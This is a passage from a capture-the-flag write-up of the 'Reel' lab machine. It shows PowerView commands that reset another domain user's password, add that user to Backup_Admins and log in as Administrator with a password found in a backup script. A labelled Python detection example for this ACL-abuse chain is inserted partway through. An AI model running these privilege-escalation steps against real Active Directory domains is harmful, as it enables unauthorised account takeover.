Let’s change the password of claire

PS C:\Users\tom\Downloads> $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force                          
PS C:\Users\tom\Downloads> Set-DomainUserPassword -Identity claire -AccountPassword $UserPassword                             
PS C:\Users\tom\Downloads>

Let’s log in with the claire account now.

Microsoft Windows [Version 6.3.9600]                                                                                           
(c) 2013 Microsoft Corporation. All rights reserved.                                                                           

claire@REEL C:\Users\claire>       

We are claire on the box now.

[Pasted image 20210726155556.png]

Add-DomainGroupMember -Identity 'Backup_admins' -Members 'claire'
PS C:\Users\claire\Downloads> net user claire                                                                                  
User name                    claire                                                                                            
Full Name                    Claire Danes                                                                                      
Comment                                                                                                                        
User's comment                                                                                                                 
Country/region code          000 (System Default)                                                                              
Account active               Yes                                                                                               
Account expires              Never                                                                                             

Password last set            7/26/2021 11:49:51 AM                                                                             
Password expires             Never                                                                                             
Password changeable          7/27/2021 11:49:51 AM                                                                             
Password required            Yes                                                                                               
User may change password     Yes                                                                                               

Workstations allowed         All                                                                                               
Logon script                                                                                                                   
User profile                                                                                                                   
Home directory                                                                                                                 
Last logon                   7/26/2021 11:35:39 AM                                                                             

Logon hours allowed          All                                                                                               

Local Group Memberships      *Hyper-V Administrator                                                                            
Global Group memberships     *Backup_Admins        *Domain Users                                                               
                             *MegaBank_Users       *DR_Site                                                                    
                             *Restrictions                                                                                     
The command completed successfully.                                                                                            


[Pasted image 20210726162748.png]

We are a member of Backup_Admins now.
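Each step of the chain above leaves a record on the domain controller: the owner and DACL changes on claire's object are 5136 (directory service object modified, attribute nTSecurityDescriptor; this needs object-access auditing enabled on the user objects), the Set-DomainUserPassword is a 4724 (password reset attempt) by tom, and the Add-DomainGroupMember is a 4728 (member added to a security-enabled global group) where claire adds herself. The following is an added detection example and not code from the post: it correlates constructed sample events with simplified field names (not the real event XML) and alerts when a non-admin principal rewrites a security descriptor and then resets that same account's password within a time window, or when a sensitive group gains a member outside the admin allow-list. The allow-list and the sensitive-group list are assumptions for the demo.

```python
"""Correlate DC security events for the chain used above:
owner/DACL change on a user object, then a password reset by the same
non-admin principal, then a self-add to a sensitive group.

Added detection example, not code from the writeup. Events are constructed
samples shaped after event IDs 5136, 4724 and 4728 with simplified fields.
"""
from datetime import datetime, timedelta

# Assumption: accounts expected to administer users and groups.
ADMIN_ACCOUNTS = {"administrator"}
# Assumption: groups whose membership changes should always alert.
SENSITIVE_GROUPS = {"domain admins", "backup_admins"}

SAMPLE_EVENTS = [  # constructed
    # 5136: nTSecurityDescriptor rewritten twice (owner, then DACL) by tom
    {"id": 5136, "time": "2021-07-26T11:40:02", "subject": "tom",
     "object": "CN=claire,CN=Users,DC=HTB,DC=LOCAL", "attribute": "nTSecurityDescriptor"},
    {"id": 5136, "time": "2021-07-26T11:40:10", "subject": "tom",
     "object": "CN=claire,CN=Users,DC=HTB,DC=LOCAL", "attribute": "nTSecurityDescriptor"},
    # 4724: tom resets claire's password (time matches "Password last set" above)
    {"id": 4724, "time": "2021-07-26T11:49:51", "subject": "tom", "target": "claire"},
    # 4728: claire adds herself to Backup_Admins
    {"id": 4728, "time": "2021-07-26T11:55:30", "subject": "claire",
     "group": "Backup_Admins", "member": "claire"},
    # benign: a reset done by an admin account earlier that day, must not alert
    {"id": 4724, "time": "2021-07-26T09:00:00", "subject": "administrator", "target": "nico"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def _cn(distinguished_name):
    """'CN=claire,CN=Users,DC=HTB,DC=LOCAL' -> 'claire'"""
    return distinguished_name.split(",", 1)[0].split("=", 1)[1].lower()


def correlate(events, window=timedelta(minutes=30)):
    """Return (rule, subject, target) tuples in time order."""
    alerts = []
    ordered = sorted(events, key=_ts)
    acl_changes = [e for e in ordered
                   if e["id"] == 5136 and e["attribute"].lower() == "ntsecuritydescriptor"]
    for ev in ordered:
        subject = ev["subject"].lower()
        if ev["id"] == 4724 and subject not in ADMIN_ACCOUNTS:
            target = ev["target"].lower()
            # a security-descriptor change on the same object by the same
            # principal shortly before the reset is the ACL-abuse pattern
            prior = [a for a in acl_changes
                     if a["subject"].lower() == subject and _cn(a["object"]) == target
                     and timedelta(0) <= _ts(ev) - _ts(a) <= window]
            if prior:
                alerts.append(("acl-then-reset", ev["subject"], ev["target"]))
        elif ev["id"] == 4728 and ev["group"].lower() in SENSITIVE_GROUPS:
            if subject == ev["member"].lower():
                alerts.append(("self-add-sensitive-group", ev["subject"], ev["group"]))
            elif subject not in ADMIN_ACCOUNTS:
                alerts.append(("sensitive-group-add", ev["subject"], ev["group"]))
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(*alert)
```

The join on subject and object is what separates this from routine helpdesk resets: an administrator resetting a user's password produces a lone 4724, while an owner or DACL rewrite followed minutes later by a reset from the same non-admin account is the sequence the BloodHound path above describes. The 5136 events only exist if the user objects carry a SACL for Write DAC and Write Owner, which is the configuration change this detection depends on.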

We are able to access the Administrator account’s Desktop, but we are not able to read root.txt. We can, however, access the “Backup_Scripts” directory.

[Pasted image 20210726165734.png]

[Pasted image 20210726165705.png]

password: Cr4ckMeIfYouC4n!

Log in as the administrator user with the password obtained. [Pasted image 20210726165958.png]

YAY! We have administrator access.

This post is licensed under CC BY 4.0 by the author.